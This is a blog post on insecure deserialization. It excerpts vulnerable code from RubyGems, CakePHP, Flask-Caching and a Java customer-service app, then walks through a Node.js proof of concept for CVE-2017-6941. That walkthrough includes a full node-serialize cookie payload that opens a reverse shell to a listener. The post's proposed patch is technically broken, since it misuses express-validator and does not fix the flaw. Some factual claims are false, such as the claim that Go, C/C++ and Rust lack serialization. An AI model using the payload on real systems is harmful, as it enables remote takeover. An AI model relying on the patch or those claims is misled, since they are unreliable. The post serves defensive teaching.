Insecure Deserialization

Barış Ekin Yıldırım07 Jun 2022
Secure CodingAppSecInsecure Deserialization

Today’s topic is Insecure Deserialization. After many years it’s still maintaining its position on the OWASP Top 10 list, and it’s safe to assume that we will see many related CVEs in the next years.

In OWASP Top 10-2021, it was not categorized separately like in 2017 but placed under the larger category of A08: Software and Data Integrity Failures.

Despite its popularity, some security experts are still unaware of its consequences, and for non-technical people, it is a mystery why we need serialization and deserialization.

So let’s clarify these two concepts first.

P.S. If you are using Python or Ruby, Marshall & Unmarshall are similar to Serialization & Deserialization.

What Is Serialization & Deserialization?

Serialization translates an object or data structure into a more suitable format to transfer it via a preferred medium (i.e., network, storage, array buffer, etc.) and reconstructs it later.

Serialization is not available for static-type languages(Go, C/C++, Rust etc.) since dynamic objects can’t be cast to another object.

There are different libraries or classes for different languages for serialization/deserialization purposes such as;

  1. Python - Pickle
  2. PHP - Serialize/Unserialize
  3. Java - objectInputStream/objectOutputStream
  4. Javascript - JSON.stringfy()/JSON.parse()

Deserialization is the exact opposite of serialization. It simply means reconstructing the translated data to its original format, and developers can benefit from both concepts.

In Java programming, serialization facilitates the transportation of the code from one JVM to another. Another use case for VM containing languages(Java, .NET Core, C#) is that this process makes the deep copy available.

Risks of Insecure Deserialization

The impact of insecure deserialization depends on the business criticality of the application. It may lead to remote code execution, denial of service(DoS) attacks, and authentication bypasses.

Even though SAST, DAST, and IAST tools can sometimes detect such vulnerabilities, a human’s supervision would still be good to confirm the findings.

Reviewing Real World Cases

This chapter will examine real-world cases that have already affected many production systems. The approach here will increase your understanding of the Deserialization vulnerabilities since these were legit vulnerabilities in the near past.

Ruby

One of Ruby's notorious unsafe library functions is the YAML library's "load" function. It's insecure, yet it's possible to see it in production environments today. The below code snippet shows a real-world example of how it's used on the popular package manager of Ruby, RubyGems.

RubyGems version 2.5.0 and earlier, before trunk revision 62422, contains a Deserialization of Untrusted Data vulnerability in owner command that can result in code execution.

This attack appears to be exploitable when the victim runs the gem owner command on a gem via a specially crafted YAML file.

Since there is no sanitation or validation implemented for the “owners” object, it’s accepting the malicious payload. This vulnerability appears to have been fixed in 2.7.6.

end
  with_response response do |resp|
  owners = YAML.load resp.body

  say "Owners for gem: #{name}"
  owners.each do |owner|

PHP

According to W3Techs’ report, PHP has %77.5 market share of overall server-side programming languages. It’s still loved by many developers hence lots of frameworks developed on its behalf of it. While using frameworks is really increasing productivity and code safety, it’s not making our applications a fortress. Let's examine a highly used PHP framework’s deserialization vulnerability.

CakePHP is a rapid development framework for PHP developers. It was vulnerable to a file inclusion attack since it used the "unserialize()" function on unchecked user input, making injecting arbitrary objects into the scope possible.

function _validatePost(&$controller) {
  -- snip --
  $check = $controller->data;
  $token = urldecode($check['_Token']['fields']);

  if (strpos($token, ':')) {
    list ($token, $locked) = explode( ':', $token, 2 );
  }

  $locked = unserialize(str_rot13($locked));
  -- snip --

As you can see from the above, the $check array contains the user-supplied POST data and $locked is a simple (rot-13 obfuscated) serialized string, which is completely under the user’s control.

Python

There are many third-party libraries to parse and unparse data in Python. In the Python universe, this parsing operation is also known as Marshalling; it’s the same with Serialization. Python Pickle library is known as a vulnerable serialization or marshalling library.

A popular Python framework Flask 1.10.1 was using Python Pickle Serialization library to implement serialization. However, Pickle library is notorious for being insecure. We do not recommend using it in any sort of production environment.

Flask-Caching extension through 1.10.1 for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation.

Suppose an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.). In that case, they can construct a crafted payload, poison the cache, and execute Python code.

        suffix=self._fs_transaction_suffix, dir=self._path
       )
       with os.fdopen(fd, "wb") as f:
            pickle.dump(timeout, f, 1)
            pickle.dump(value, f, pickle.HIGHEST_PROTOCOL)
       os.replace(tmp, filename)
       os.chmod(filename, self._mode)
   except (IOError, OSError) as exc:

Java

As mentioned earlier in the article, in Java programming, serialization facilitates the transportation of the code from one JVM to another. And it’s making the deep copy available in JVM. However, as it has beneficial sides it’s also coming with a trade-off in some cases.

This example is from a popular open source project in China; Chunsong Customer Service(aka. Chatopera cosin).

As can be seen at below code snippet, in the impsave method of the TemplateController. java file, the bytecode of the uploaded file is read at the red marked line, and the toObject method in the MainUtils tool class is called.

Following up on this method, it is found that the file content is deserialized directly. This means an attacker can execute arbitrary commands on the server by uploading a maliciously constructed file.

TemplateController. java

@RequestMapping("/impsave")
   @Menu(type = "admin" , subtype = "template" , access = false , admin = true)
   public ModelAndView impsave (ModelMap map , HttpServletRequest
request @RequestParam(value = "dataFile", required = false ) MultipartFile dataFile)
throws Exception {
     if(dataFile!=null && dataFile.getSize() > 0){
         List<Template> templateList = (List<Template>) MainUtils.toObject(dataFile.getBytes()) ;
         if(templateList!=null && templateList.size() > 0){
            templateRes.deleteInBatch(templateList);
            for(Template template : templateList){
               templateRes.save(template) ;
            }
         }
      }
      return request(super.createView("redirect:/admin/template/index.html"));
    }

MainUtils.java

public static Object toObject(byte[] data) throws Exception {
   ByteArrayInputStream input = new ByteArrayInputStream(data);
   ObjectInputStream objectInput = new ObjectInputStream(input);
   return objectInput.readObject();
}

Deserialization PoC on Node.js

CVE-2017-6941 is a well known vulnerability. A serialization library for Node.JS named node-serialize version 0.0.4 contains an insecure deserialization vulnerability.

To test this CVE we can use the following one page code:

var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
var app = express();

app.use(cookieParser())
app.get('/', function(req, res) {
   if (req.cookies.profile) {
      var str = new Buffer(req.cookies.profile, 'base64').toString();
      var obj = serialize.unserialize(str);

      if (obj.username) {
         res.send( "Hello " + escape(obj.username));
      }
   } else {
      res.cookie('profile', "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ==" , {
         maxAge: 900000,
         httpOnly: true
      });
      res.send("Hello stranger");
   }
});

app.listen(3000);

A basic HTML page is welcoming us.

As you can see there are no input fields in this web page and that means it can’t be hacked, right?

Not so true.

Actually if you check the vulnerable code above, by default it’s grabbing the username value as a generic welcome message:

res.send("Hello stranger");

However after checking the hardcoded base64 token, the “stranger” part is changing as “admin”. Let’s decode that token to see what it’s made of:

{"username":"admin","company":"kondukto","location":"cloudbank"}

As you can see, this is a simple cookie with key-pair fields.

Let’s continue

var str = new Buffer(req.cookies.profile, 'base64').toString();
var obj = serialize.unserialize(str);

In this codeblock an object called “str” has been created and it’s getting the value from that hardcoded base64. After that it’s unserializing that value and assigning it to another object called “obj”.

if (obj.username) {
   res.send("Hello " + escape(obj.username));
}

In the next code block you can see that the obj object’s username section is printing on the screen.

So basically this program is getting it’s username value from the cookie that is assigned to you (which you can control) and showing it on the screen after deserializing and serializing it.

That means we can insert a code of our choice to the cookie header section of an HTTP request and watch what happens.

The payload for to test the application is:

{"rce":"_$$ND_FUNC$$_function() { var net = require('net'); var spawn =
require('child_process').spawn; HOST = \"127.0.0.1\"; PORT = \"3443\";
TIMEOUT = \"5000\"; if (typeof String.prototype.contains === 'undefined') { 
String.prototype.contains = function(it) { return this.indexOf(it) != -1;
}; } function c(HOST, PORT) { var client = new net.Socket();
client.connect(PORT, HOST, function() { var sh = spawn(\"sh\", []);
client.write(\"Connected!\"); client.pipe(sh.stdin);
sh.stdout.pipe(client); sh.stderr.pipe(client); sh.on('exit',
function(code, signal) { client.end(\"Disconnected!\"); }); });
client.on('error', function(e) { setTimeout(c(HOST, PORT), TIMEOUT); }); }
c(HOST, PORT);}( )"}

This code block is basically executing a remote connection command and dropping a shell to your listening host.

Since the cookie section requires base64, we have to encode it and after that intercept the HTTP package with a proxy and add it our new cookie value. And that’s it! A new shell session is created on demand:

How To Patch A Node.js PoC Deserialization Vulnerability

The best way to patch such a vulnerability is always using the latest version of the vulnerable library. However, in this case the vulnerable version is the latest one and for the sake of our example let’s say we must use this vulnerable library.

As mentioned earlier, one of the deadly sins in the application security bible is trusting user input. To validate user input “express-validator” library will be used. Here is the patched version of the vulnerable code.

var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
const { check } = require('express-validator');

var app = express();

app.use(cookieParser())
app.get('/', function(req, res) {
   if (req.cookies.profile) {
      var str = new Buffer(req.cookies.profile, 'base64').toString();
      var patched = check(str).isString().escape().trim();
      var obj = serialize.unserialize(patched);

      if (obj) {
         res.send( "Hello " + escape(obj));
      }
   } else {
      res.cookie('profile', "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ==" , {
         maxAge: 900000,
         httpOnly: true
      });
      res.send("Hello stranger");
   }
});

app.listen(3000);

There are two significant changes in that code. The first one is adding the library of course

const { check } = require('express-validator');

And the second one is trimming and escaping from the user input.

After applying the patch, the payload does not work anymore and the world becomes a safer place for another 5 minutes.

How To Avoid Insecure Deserialization?

To avoid the insecure deserialization problem, the first thing you should do is not accept serialized objects from untrusted sources. Besides, the following suggestions may help you as well:

  • Always validate the user input. Ensure you are using the safe listing methodology since it might not be possible to avoid all current & future attacks.
  • Only deserialize the signed data. It’s achievable by implementing digital signatures on your input processing process.
  • Avoid using vulnerable functions or modules (like Python Pickle, Ruby YAML library, etc.).
  • Use language-agnostic serialization/deserialization methods like JSON.
  • Look for your programming-language-specific mitigations.
  • If you have to use untrustworthy input, deserialize the data in an isolated low-level privileged environment.
  • Using a WAF to protect your application will improve overall security.

You can find the examples used in the article in this link.

Get A Demo